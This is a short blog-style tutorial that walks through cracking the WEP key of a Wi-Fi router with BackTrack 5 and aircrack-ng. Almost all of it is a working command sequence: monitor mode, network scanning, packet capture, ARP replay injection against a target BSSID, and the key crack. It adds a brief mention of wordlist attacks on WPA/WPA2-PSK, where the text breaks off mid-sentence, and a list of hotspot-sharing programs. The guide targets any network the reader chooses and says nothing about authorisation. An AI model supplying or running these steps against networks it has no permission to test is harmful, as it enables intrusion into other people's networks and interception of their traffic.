How to recover WEP key on a Wifi Router using BackTrack 5

  • BackTrack > Open GUI Mode > Open Terminal
  • Check wifi adaptor compatibility with “iwconfig”
  • Put adaptor in monitor mode with “airmon-ng start wlan0”
  • Scan for networks with “airodump-ng mon0”
  • Find the “WEP” network you want to crack and copy it’s BSSID
  • Capture packets with “airodump-ng -c <channel> -w <output filename> –bssid <bssid> mon0”
  • Open new tab with CTRL+SHIFT+T and type “aireplay-ng –arpreplay -b <bssid> -h <STATION> mon0”
  • “STATION” can be found in “airodump” tab.
  • Open new tab and write “aircrack-ng -z -b <bssid> <output filename from earlier>*.cap”
  • After successful crack, you will be notified about key found and the key will be in ASCII.

WPA-PSK and WPA2-PSK can also be hacked with a list of words which can be suplied to aircrack-ng (

Wifi Repeating Softwares:
Windows: Marifi, Connectify, MyPublicWifi
Linux: Hostapd
Android: Not Possible


Leave a comment

Your email address will not be published. Required fields are marked *